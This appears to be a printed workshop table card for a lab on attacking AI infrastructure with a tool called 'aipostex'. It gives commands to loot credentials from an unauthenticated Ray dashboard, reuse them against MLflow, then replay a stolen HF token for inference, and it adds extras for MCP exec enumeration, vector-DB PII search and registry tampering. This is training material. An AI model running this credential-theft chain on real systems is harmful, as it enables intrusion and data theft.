Skip to content

aipostex — RTV Table Card

One-page quick reference for the hands-on tactic. Print one per table. Everything you need is on this card; the QR opens the full guide.


The mission

This lab is ACME's shadow-AI estate. One open Ray dashboard leaks a credential for another team's MLflow, which leaks an inference token for a third team's serving gateway — ending in real model generation. One foothold, three teams.

Three moves: map the estate → run one credential chain → score your coverage.


1 · Connect & smoke-test (5 min)

# Your VPN config + attack-box address are on the table.
./aipostex version                   # confirm the binary is here
mkdir -p ~/lab-results               # everything you collect lands here for scoring
./aipostex discover network --target 172.16.50.10 --ports 3000 --mode detect   # smoke test

2 · The guided chain (each hop loots the next hop's key)

# (1) Map the estate
./aipostex discover network --target 172.16.50.10,172.16.50.20,172.16.50.30,172.16.50.40 \
    --format json -o ~/lab-results/discover.json

# (2) Ray dashboard (unauthenticated) — a job's runtime_env leaks the MLflow Basic credential
./aipostex ray --target http://172.16.50.20:8265 jobs \
    --format json -o ~/lab-results/ray.json

# (3) MLflow gateway — authenticate with the Ray-looted Basic cred; a run param leaks an HF token
./aipostex mlflow --target http://172.16.50.30:5000 \
    --header "Authorization: Basic <ray-looted-basic>" runs --limit 20 \
    --format json -o ~/lab-results/mlflow.json

# (4) HF TGI gateway — replay the looted HF token for REAL model inference
./aipostex huggingface --target http://172.16.50.40:8180 \
    --header "Authorization: Bearer <mlflow-looted-hf-token>" \
    generate --prompt "incident response playbook" --force-exploit \
    --format json -o ~/lab-results/hf.json

The <...> placeholders are credentials you loot from the previous step's output — that hand-off is the whole point.

3 · Score your assessment

python3 ~/lab/scoring/score.py ~/lab-results --strict

You get a report card: coverage of the planted findings, graded by proof strength (reached → read-with-credential → real execution). It grades what your scan surfaced — it doesn't spoil answers.


Finish early? Keep going on your estate

./aipostex mcp --target http://172.16.50.10:3000 enum            # real MCP server: tools → exec/file/env
./aipostex vectordb --type chromadb --target 172.16.50.20:8000 search-sensitive --limit 50   # PII in RAG
./aipostex a2a --target http://172.16.50.40:8100 enum            # agent-to-agent surface
./aipostex mlflow --target http://172.16.50.20:5000 registry     # model registry tampering primitive
./aipostex wandb --target http://172.16.50.20:8444 enum          # experiment-tracking secrets

Full menu: Attack Scenarios (12) in the guide. Stuck? Ask a room volunteer.


Take it home